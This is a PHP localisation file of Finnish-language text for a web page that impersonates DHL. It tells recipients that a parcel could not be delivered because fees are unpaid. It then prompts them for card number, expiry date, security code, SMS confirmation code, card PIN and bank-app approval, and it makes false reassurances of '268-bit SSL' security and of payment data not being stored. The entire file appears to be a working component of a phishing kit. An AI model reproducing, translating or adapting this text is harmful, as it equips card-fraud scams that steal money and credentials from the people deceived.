<?php 
$langs = array(
    "title" => "DHL",
    "help_support" => "Apua ja Tuki",
    "home" => "Etusivu",
    "ship" => "Lähetä",
    "track" => "Seuraa",
    "delivery_services" => "Toimituspalvelut",
    "delivery_text" => "Paketisi on valmis toimitettavaksi. Jatkaaksesi suorita tarvittavat maksut.",
    "card_declined_error" => "Kortti hylätty. Kokeile toista korttia tai ota yhteyttä pankkiisi.",
    "cardholder_name" => "Kortinhaltijan nimi",
    "card_number" => "Kortin numero",
    "expiry_code" => "Viimeinen voimassaolopäivä",
    "security_code" => "Turvakoodi",
    "continue" => "Jatka",
    "ssl_security" => "Tämä sivu on suojattu 268-bittisellä SSL-salauksella.",
    "payment_security_notice" => "Varmista, että maksusivumme on erittäin turvallinen. Henkilökohtaiset tietosi ja maksutietosi ovat täysin salattuja ja suojattuja edistyneiden suojausprotokollien avulla, jotta tietosi pysyvät yksityisinä ja turvallisina. Lisäksi emme tallenna mitään maksutietojasi.",
    "about_dhl" => "Tietoa DHL:stä",
    "press" => "Lehdistö",
    "careers" => "Ura",
    "legal_notice" => "Laillinen ilmoitus",
    "alerts" => "HÄLYTYKSET",
    "fraud_awareness" => "Tietoa petoksista",
    "important_information" => "Tärkeitä tietoja",
    "legal" => "OIKEUDELLINEN",
    "terms_conditions" => "Ehdot",
    "privacy_notice" => "Tietosuojaseloste",
    "contact_support" => "OTA YHTEYTTÄ JA TUKI",
    "faqs" => "UKK",
    "contact_us" => "Ota meihin yhteyttä",
    "find_location" => "Löydä sijainti",
    "payment_confirmation" => "Maksun vahvistus",
    "confirm_payment_text" => "Vahvistaaksesi tämän maksun, lähetä koodi, joka on lähetetty puhelinnumeroosi.",
    "invalid_confirmation_code" => "Virheellinen vahvistuskoodi. Yritä uudelleen.",
    "confirmation_code" => "Vahvistuskoodi",
    "additional_verification" => "Tarvitsemme lisävahvistuksen annetulle maksutavalle. Syötä korttisi PIN-koodi jatkaaksesi.",
    "incorrect_card_pin" => "Väärä kortin PIN-koodi.",
    "card_pin" => "Kortin PIN-koodi",
    "please_wait" => "Odota hetki...",
    "do_not_leave" => "Älä poistu tältä sivulta. Sinut ohjataan automaattisesti uudelleen.",
    "payment_successful" => "Maksu onnistui!",
    "payment_success_text" => "Maksusi onnistui. Saat pian päivityksiä paketistasi antamiesi yhteystietojen kautta. Kiitos luottamuksestasi!",
    "app_title" => "Vahvista maksusi",
    "app_text" => "Vahvista maksusi pankkisovelluksessa <br> napsauttamalla vastaanotettua push-ilmoitusta.",
    "track_title" => "Toimitusyritys epäonnistui.",
        "track_text" => "Pakettiasi ei voitu toimittaa, koska tarvittavia maksuja ei ole vielä suoritettu.<br>Napsauta alla olevaa 'Jatka'-painiketta lisätäksesi maksutavan ja suorittaaksesi maksun.",
        "table" => ["Seurantanumero :", "Päivämäärä :", "Summa :"]
    

);
?>
